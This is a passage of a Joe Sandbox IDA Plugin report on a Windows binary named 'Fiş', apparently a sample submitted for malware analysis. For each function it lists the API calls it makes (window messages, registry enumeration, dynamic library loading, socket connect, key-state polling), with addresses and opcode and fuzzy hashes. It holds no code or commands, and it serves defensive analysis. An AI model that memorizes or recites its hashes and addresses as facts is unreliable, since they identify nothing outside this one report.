                                                        • Opcode Fuzzy Hash: ea11c157e6eab2275dff30dfeb0fb725c18fb1654c28915e41d11e80dab0828b
                                                        • Instruction Fuzzy Hash: 11217F35A00208AFCB10EFA5DD85DAEBBF8EF89704B145069F609F7251DB71EA05CB61
                                                        APIs
                                                          • Part of subcall function 00E7C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E7C84A
                                                          • Part of subcall function 00E7C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7C85D
                                                          • Part of subcall function 00E7C82D: GetCurrentThreadId.KERNEL32 ref: 00E7C864
                                                          • Part of subcall function 00E7C82D: AttachThreadInput.USER32(00000000), ref: 00E7C86B
                                                        • GetFocus.USER32 ref: 00E7CA05
                                                          • Part of subcall function 00E7C876: GetParent.USER32(?), ref: 00E7C884
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E7CA4E
                                                        • EnumChildWindows.USER32(?,00E7CAC4), ref: 00E7CA76
                                                        • __swprintf.LIBCMT ref: 00E7CA90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                        • String ID: %s%d
                                                        • API String ID: 3187004680-1110647743
                                                        • Opcode ID: 74d766b6a1c228b00a582a88e9cbaf1da58aefa3dae641ec83f05a3dbca3f0b3
                                                        • Instruction ID: 60d0cb582c271e40758a5eed33db6fb6b324337548c814d545da6dd4f488a30d
                                                        • Opcode Fuzzy Hash: 74d766b6a1c228b00a582a88e9cbaf1da58aefa3dae641ec83f05a3dbca3f0b3
                                                        • Instruction Fuzzy Hash: E1117F716002096BDB11BFA09C86FE937ACAF45714F10A07AFE0DBA182DB71A546DB71
                                                        APIs
                                                        • __lock.LIBCMT ref: 00E67AD8
                                                          • Part of subcall function 00E67CF4: __mtinitlocknum.LIBCMT ref: 00E67D06
                                                          • Part of subcall function 00E67CF4: EnterCriticalSection.KERNEL32(00000000,?,00E67ADD,0000000D), ref: 00E67D1F
                                                        • InterlockedIncrement.KERNEL32(?), ref: 00E67AE5
                                                        • __lock.LIBCMT ref: 00E67AF9
                                                        • ___addlocaleref.LIBCMT ref: 00E67B17
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                        • String ID: `
                                                        • API String ID: 1687444384-4168407445
                                                        • Opcode ID: 19beb695b8a221b01fcc2f447b5f14887b231b58376808a45b616a59127e6e21
                                                        • Instruction ID: 93db0d50a9ba20784123725bfaa0b3eae5c52a86c9e48233080440c4081a07d5
                                                        • Opcode Fuzzy Hash: 19beb695b8a221b01fcc2f447b5f14887b231b58376808a45b616a59127e6e21
                                                        • Instruction Fuzzy Hash: 0D016D71484B00DFD730DF75E90674ABBF0EF54369F20A90EA4DAA72A0CB74A684CB45
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EA19F3
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EA1A26
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EA1B49
                                                        • CloseHandle.KERNEL32(?), ref: 00EA1BBF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: def5aa4bd5e5b31eaafbfc672e329cb925caf18b18bed0351e6dea2a27197c87
                                                        • Instruction ID: 6603ecb1b3db14b1d8a8351599c35afdacb4fabe2e655363481800acc07b9883
                                                        • Opcode Fuzzy Hash: def5aa4bd5e5b31eaafbfc672e329cb925caf18b18bed0351e6dea2a27197c87
                                                        • Instruction Fuzzy Hash: AD818270600204EBDF109F64C886BAEBBE5AF49720F149899F905BF3C2D7B5AD45CB90
                                                        APIs
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00EAE1D5
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EAE20D
                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 00EAE248
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EAE269
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00EAE281
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                        • String ID:
                                                        • API String ID: 3188977179-0
                                                        • Opcode ID: 708c9b24dbac457ba291b5acd46b77aedd5f00127de9ce245760e522567b5c47
                                                        • Instruction ID: d22763819baff938b24ecfee58ccd914fd992b344157f74960c904e3c3ad9386
                                                        • Opcode Fuzzy Hash: 708c9b24dbac457ba291b5acd46b77aedd5f00127de9ce245760e522567b5c47
                                                        • Instruction Fuzzy Hash: FE619E34A05214AFDB24CF58CC95FAA7BBAFF9E304F145069E859AB3A1C771B940DB10
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00E81CB4
                                                        • VariantClear.OLEAUT32(00000013), ref: 00E81D26
                                                        • VariantClear.OLEAUT32(00000000), ref: 00E81D81
                                                        • VariantClear.OLEAUT32(?), ref: 00E81DF8
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E81E26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType
                                                        • String ID:
                                                        • API String ID: 4136290138-0
                                                        • Opcode ID: ad0957cdd2bc92bb3ea2a92e1a069fa161c4f97d4a37fa9e3740d187fdfbf018
                                                        • Instruction ID: 1a0395f1a5ba47b5e70220572e717430b08c4478b518f49653365999d9bf7efb
                                                        • Opcode Fuzzy Hash: ad0957cdd2bc92bb3ea2a92e1a069fa161c4f97d4a37fa9e3740d187fdfbf018
                                                        • Instruction Fuzzy Hash: 7F516BB5A00209EFCB14DF58C880EAAB7B8FF4C314B158569ED59EB341D331E952CBA0
                                                        APIs
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00EA06EE
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EA077D
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EA079B
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00EA07E1
                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00EA07FB
                                                          • Part of subcall function 00E5E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E8A574,?,?,00000000,00000008), ref: 00E5E675
                                                          • Part of subcall function 00E5E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E8A574,?,?,00000000,00000008), ref: 00E5E699
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: aeb92264deed8e5a73c4a0bb2331e032885a24908b8f09274e4449ec45ed3af6
                                                        • Instruction ID: 4d96f93ae3ec0a997e84c029ccc99a54a31ed1e3ee04264e335a6ab39cf908de
                                                        • Opcode Fuzzy Hash: aeb92264deed8e5a73c4a0bb2331e032885a24908b8f09274e4449ec45ed3af6
                                                        • Instruction Fuzzy Hash: 10514675A00205DFCB04EFA8D881DADB7F5AF49314B14906AF915BB362DB31EE46CB80
                                                        APIs
                                                          • Part of subcall function 00EA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA2BB5,?,?), ref: 00EA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA2EEF
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EA2F2E
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EA2F75
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00EA2FA1
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EA2FAE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                        • String ID:
                                                        • API String ID: 3740051246-0
                                                        • Opcode ID: 48470a9494736e347064a69df5d5bcb614a994577fb9022c1d492267e8dfeef7
                                                        • Instruction ID: 7b655497efaf2f6c37b2165af1565ec9127131193b38a8d3349e195b7aea7036
                                                        • Opcode Fuzzy Hash: 48470a9494736e347064a69df5d5bcb614a994577fb9022c1d492267e8dfeef7
                                                        • Instruction Fuzzy Hash: 7E513A71208204AFD704EF68DC81E6AB7F9FF89304F14982DF655AB2A1DB31E905CB52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7983a26675b8bb7122f3d39241177e5f6339bd6abf645342cf9f2ba304fd93e
                                                        • Instruction ID: 0ac3b45842b2ce2f7fdcf8cb04ed14f3de57f60d2e9dff09e909cf85a8a84c0c
                                                        • Opcode Fuzzy Hash: c7983a26675b8bb7122f3d39241177e5f6339bd6abf645342cf9f2ba304fd93e
                                                        • Instruction Fuzzy Hash: 4441A339904108AFC714DF68CC44FA9BBA8FB0E314F256275E95ABB2D1C631BD41DA90
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E912B4
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E912DD
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E9131C
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E91341
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E91349
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: ecc452ec173c7946111b2fc769696f8072b204b7b8ab77f8444f6f2533859a0e
                                                        • Instruction ID: 15308f91a6b3d3ad05f7f3ffcd57a021d3f359cbc782c3e5ed6b40754a106e2b
                                                        • Opcode Fuzzy Hash: ecc452ec173c7946111b2fc769696f8072b204b7b8ab77f8444f6f2533859a0e
                                                        • Instruction Fuzzy Hash: F6411A35A00105DFCF01EF64C981AAEBBF5EF49314B1490A9E90ABB3A2CB31ED01DB50
                                                        APIs
                                                        • GetCursorPos.USER32(000000FF), ref: 00E5B64F
                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00E5B66C
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00E5B691
                                                        • GetAsyncKeyState.USER32(00000002), ref: 00E5B69F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 1d2b68c3e67f08ac1dbf9a7aec6d7c4f5290b798d55a94d7b1a71c52222c0bc9
                                                        • Instruction ID: a34b21054595b6ff284cb5dfd725eb3b8a7c4c5c126a1140e7adaa92447529ad
                                                        • Opcode Fuzzy Hash: 1d2b68c3e67f08ac1dbf9a7aec6d7c4f5290b798d55a94d7b1a71c52222c0bc9
                                                        • Instruction Fuzzy Hash: 2C418031608105FFCF159F64CC44AEABBB4FB05325F10532AF829B6290D771A954DF91
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00E7B369
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00E7B413
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E7B41B
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00E7B429
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E7B431
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: a1db1bbc47c73e85e94cdfef685e2867e517e3a230850e00154fe766d177876f
                                                        • Instruction ID: 1cd682ece87a0b712653fbcf4ec4cf12f66a698e0e7e87fec9e50be176533d48
                                                        • Opcode Fuzzy Hash: a1db1bbc47c73e85e94cdfef685e2867e517e3a230850e00154fe766d177876f
                                                        • Instruction Fuzzy Hash: 9831BA71900219EFDB04CFA8DD4DB9E7BB5EB04329F118229F829AA2D1C3B19955CB90
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00E7DBD7
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E7DBF4
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E7DC2C
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E7DC52
                                                        • _wcsstr.LIBCMT ref: 00E7DC5C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: a7dd85ebcc997bdedc0e8fad50754e5351c6d2c48ba63b14b81746f28b68621d
                                                        • Instruction ID: bf992352cbc65c29e653075491d7060532747c348b9adb8ff9c521799c1cdd94
                                                        • Opcode Fuzzy Hash: a7dd85ebcc997bdedc0e8fad50754e5351c6d2c48ba63b14b81746f28b68621d
                                                        • Instruction Fuzzy Hash: 4521D771208144BBEB165B399C49E7BBBB8DF45764F109039F90EFA191EAA2DC41D2A0
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E7BC90
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E7BCC2
                                                        • __itow.LIBCMT ref: 00E7BCDA
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E7BD00
                                                        • __itow.LIBCMT ref: 00E7BD11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: d3078bb2e54aa147581a6a76632ff2a28fdc6bce30783ab28fe864d9593ba30b
                                                        • Instruction ID: 4037fd3791f5030a40d4d472fc884ae81a3ac36093aeb52f83ddd7e0bcef8851
                                                        • Opcode Fuzzy Hash: d3078bb2e54aa147581a6a76632ff2a28fdc6bce30783ab28fe864d9593ba30b
                                                        • Instruction Fuzzy Hash: 2321C935600608BBDB21AE659C45FDE7AA8AF49750F00A075FA4AFB182DB71890687A1
                                                        APIs
                                                          • Part of subcall function 00E450E6: _wcsncpy.LIBCMT ref: 00E450FA
                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00E860C3), ref: 00E86369
                                                        • GetLastError.KERNEL32(?,?,?,00E860C3), ref: 00E86374
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00E860C3), ref: 00E86388
                                                        • _wcsrchr.LIBCMT ref: 00E863AA
                                                          • Part of subcall function 00E86318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00E860C3), ref: 00E863E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                        • String ID:
                                                        • API String ID: 3633006590-0
                                                        • Opcode ID: 69edc8871bee6f6025b6530a6959a9199af79051241880a99fee99816ed3a7c6
                                                        • Instruction ID: 83f50e17ccdc87864c9479d3d33c0f45d68c459db794fcec6271f9d012db0c6e
                                                        • Opcode Fuzzy Hash: 69edc8871bee6f6025b6530a6959a9199af79051241880a99fee99816ed3a7c6
                                                        • Instruction Fuzzy Hash: AF2127315042159BDB25BB78AC42FEA33ACEF563A5F102479F05DF30C0EB61D9858B50
                                                        APIs
                                                          • Part of subcall function 00E9A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00E9A84E
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E98BD3
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E98BE2
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00E98BFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 3701255441-0
                                                        • Opcode ID: 4448b5f65eea59c302765c41a4a0fb55b2c4f022d3c180294eaf1ee8a9168504
                                                        • Instruction ID: a34136392d86638465fed73d97f40c6ab51c2edaa4c3f724412e7ccaa72b9c1b
                                                        • Opcode Fuzzy Hash: 4448b5f65eea59c302765c41a4a0fb55b2c4f022d3c180294eaf1ee8a9168504
                                                        • Instruction Fuzzy Hash: 7421A1312001149FDB10EF68CD45F7EB7E9AF45750F04546DF956B72A2CB70AC068761
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00E98441
                                                        • GetForegroundWindow.USER32 ref: 00E98458
                                                        • GetDC.USER32(00000000), ref: 00E98494
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00E984A0
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00E984DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
